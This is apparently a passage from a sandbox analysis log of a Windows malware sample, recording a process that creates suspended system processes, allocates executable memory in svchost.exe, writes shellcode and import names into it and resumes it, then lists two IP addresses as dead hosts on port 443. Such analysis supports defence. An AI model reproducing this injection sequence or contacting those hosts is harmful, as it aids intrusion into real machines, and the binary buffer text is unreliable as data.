process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: 6"w w
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w 
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: LeaveCriticalSection
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: 6"w w
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w 
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: InitializeCriticalSection
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: 6"w w
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0
Process injection Process 2504 resumed a thread in remote process 2748
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000000000003f8
suspend_count: 1
process_identifier: 2748
1 0 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2484
thread_handle: 0x00000108
process_identifier: 2504
current_directory: C:\Windows\system32
filepath:
track: 1
command_line: C:\Windows\system32\wermgr.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217740 (CREATE_NO_WINDOW|CREATE_SUSPENDED|DETACHED_PROCESS)
inherit_handles: 0
process_handle: 0x0000010c
1 1 0

CreateProcessInternalW

thread_identifier: 2088
thread_handle: 0x00000114
process_identifier: 1960
current_directory: C:\Windows\system32
filepath:
track: 1
command_line: C:\Windows\system32\cmd.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217740 (CREATE_NO_WINDOW|CREATE_SUSPENDED|DETACHED_PROCESS)
inherit_handles: 0
process_handle: 0x00000110
1 1 0

CreateProcessInternalW

thread_identifier: 2364
thread_handle: 0x00000000000003f8
process_identifier: 2748
current_directory:
filepath:
track: 1
command_line: C:\Windows\system32\svchost.exe
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000000000000114
1 1 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000090000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

WriteProcessMemory

buffer: UAVVWSHƒì`Hl$`HƒäðH‹ùë0H‰‡¨ÇGXH‹OÿW0H‹H‹WA¸ÿÿÿÿE3ÉÿWkGXG‰D$\‹D$\ƒøGuWH‹w`HkFH‰D$PH‹D$PH=˜u\H‹FHL‹V@L‹^8H‹^0L‹N(L‹F H‹NH‹VH‰D$8L‰T$0L‰\$(H‰\$ ëp‹D$\=Ž„Ã3ÀéZÿÿÿH‹D$PH=«uPH‹FPH‹^HL‹V@L‹^8L‹v0L‹N(L‹F H‹NH‹VH‰D$@H‰\$8L‰T$0L‰\$(L‰t$ ÿH‰‡ ¸éóþÿÿHƒ|$PtH‹D$PHƒø9uL‹F H‹NH‹VÿëÌÿëÈH‹D$PHƒøuH‹NÿëµH‹D$PHƒø&…IÿÿÿH‹NH‹VÿëšHLJ¨H‹H‹WE3ÀE3ÉÿWH‹ÿW(HÇH‹OÿW(HÇG3ÉÿW83ÀH‹å[_^A^]ÃÌÌÌÌÌÌUVHƒì(Hl$ HƒäðH‹uPH…öt@H‹EH‹M@H‰VpL‰FxL‰Ž€‹ÉH‰ŽˆH‰†H‰¶˜H‹NÿV0H‹NºÿÿÿÿÿV He^]Ã
base_address: 0x0000000000090000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000000a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: H¹ H¸ ÿà
base_address: 0x00000000ff42246c
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

NtResumeThread

thread_handle: 0x00000000000003f8
suspend_count: 1
process_identifier: 2748
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 790528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000180000000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 4 (PAGE_READWRITE)
base_address: 0x0000000180000000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

WriteProcessMemory

buffer: VERSION.dll
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

WriteProcessMemory

buffer: €o!w
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

WriteProcessMemory

buffer: GetFileVersionInfoA
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

WriteProcessMemory

buffer: 6"wìüþ
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w 
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

WriteProcessMemory

buffer: VerQueryValueA
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

WriteProcessMemory

buffer: 6"wìüþ
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w 
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

WriteProcessMemory

buffer: GetFileVersionInfoSizeA
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

WriteProcessMemory

buffer: 6"wìüþ
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w 
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

WriteProcessMemory

buffer: KERNEL32.dll
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

WriteProcessMemory

buffer: €o!w
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w 
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

WriteProcessMemory

buffer: GetLastError
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

WriteProcessMemory

buffer: 6"w w
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w 
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

WriteProcessMemory

buffer: HeapFree
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

WriteProcessMemory

buffer: 6"w w
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w 
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

WriteProcessMemory

buffer: HeapSize
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

WriteProcessMemory

buffer: 6"w w
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0
dead_host 194.146.249.137:443
dead_host 62.99.79.77:443